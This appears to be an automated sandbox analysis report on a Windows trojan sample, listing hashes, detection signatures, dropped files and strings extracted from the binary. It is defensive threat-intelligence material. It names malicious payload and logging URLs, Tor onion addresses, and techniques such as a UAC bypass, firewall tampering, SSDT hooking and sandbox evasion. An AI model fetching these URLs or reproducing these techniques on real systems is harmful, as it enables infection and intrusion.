Windows Analysis Report 4t4y4r89UZ

Overview

General Information

Sample Name: 4t4y4r89UZ (renamed file extension from none to exe)
Analysis ID: 519673
MD5: 14c0d8425930ccec0566b04864a05670
SHA1: 07fd6746417c89239e8b4b272fa350c5dc41c580
SHA256: fea538eff5bc9cd3970edda4b3ddfa0e72505b01dc207e47d8112074720fa05e
Tags: 32exetrojan
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Sigma detected: Schedule system process
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Bypass UAC via Fodhelper.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Enables debug privileges
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 4t4y4r89UZ.exe Virustotal: Detection: 33% Perma Link
Antivirus detection for URL or domain
Source: https://runmodes.com/api/log Avira URL Cloud: Label: malware
Source: http://newscommer.com/app/app.exe URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Windows\windefender.exe Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Avira: detection malicious, Label: TR/Redcap.gsjan
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Metadefender: Detection: 45% Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Metadefender: Detection: 13% Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe ReversingLabs: Detection: 73%
Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 38%
Source: C:\Windows\windefender.exe Metadefender: Detection: 28% Perma Link
Source: C:\Windows\windefender.exe ReversingLabs: Detection: 78%
Machine Learning detection for sample
Source: 4t4y4r89UZ.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Windows\rss\csrss.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.3.csrss.exe.1694ea00.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.csrss.exe.16c44000.16.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 14.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 34.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 42.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Uses 32bit PE files
Source: 4t4y4r89UZ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdb source: csrss.exe
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

Networking:

barindex
Found Tor onion address
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
